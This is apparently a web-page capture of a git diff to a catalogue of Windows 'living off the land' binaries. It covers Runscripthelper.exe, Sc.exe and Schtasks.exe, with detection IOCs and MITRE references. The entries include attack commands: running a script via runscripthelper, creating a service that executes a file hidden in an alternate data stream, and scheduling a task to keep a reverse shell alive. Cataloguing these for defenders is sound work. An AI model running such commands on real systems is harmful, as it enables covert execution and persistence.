- IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY
|
||||||
@ -25,4 +25,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Pierre-Alexandre Braeken
|
- Person: Pierre-Alexandre Braeken
|
||||||
Handle: '@pabraeken'
|
Handle: '@pabraeken'
|
||||||
---
|
---
|
||||||
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
Name: Runscripthelper.exe
|
Name: Runscripthelper.exe
|
||||||
Description:
|
Description:
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
|
- Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
|
||||||
Description: Execute the PowerShell script named test.txt
|
Description: Execute the PowerShell script named test.txt
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
|
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
|
||||||
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
|
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Event 4014 - Powershell logging
|
- IOC: Event 4014 - Powershell logging
|
||||||
@ -25,4 +25,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Matt Graeber
|
- Person: Matt Graeber
|
||||||
Handle: '@mattifestation'
|
Handle: '@mattifestation'
|
||||||
---
|
---
|
||||||
|
@ -2,12 +2,12 @@
|
|||||||
Name: Sc.exe
|
Name: Sc.exe
|
||||||
Description: Used by Windows to manage services
|
Description: Used by Windows to manage services
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
|
- Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
|
||||||
Description: Creates a new service and executes the file stored in the ADS.
|
Description: Creates a new service and executes the file stored in the ADS.
|
||||||
Usecase: Execute binary file hidden inside an alternate data stream
|
Usecase: Execute binary file hidden inside an alternate data stream
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1096
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\sc.exe
|
- Path: C:\Windows\System32\sc.exe
|
||||||
- Path: C:\Windows\SysWOW64\sc.exe
|
- Path: C:\Windows\SysWOW64\sc.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Services that gets created
|
- IOC: Services that gets created
|
||||||
@ -24,4 +24,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
@ -2,12 +2,12 @@
|
|||||||
Name: Schtasks.exe
|
Name: Schtasks.exe
|
||||||
Description: Schedule periodic tasks
|
Description: Schedule periodic tasks
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
|
- Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
|
||||||
Description: Create a recurring task to execute every minute.
|
Description: Create a recurring task to execute every minute.
|
||||||
Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
|
Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1053
|
MitreID: T1053
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1053
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1053
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\schtasks.exe
|
- Path: c:\windows\system32\schtasks.exe
|
||||||
- Path: c:\windows\syswow64\schtasks.exe
|
- Path: c:\windows\syswow64\schtasks.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Services that gets created
|
- IOC: Services that gets created
|
||||||
@ -24,4 +24,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person:
|
- Person:
|
||||||
Handle:
|
Handle:
|
||||||
---
|
---
|
||||||
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user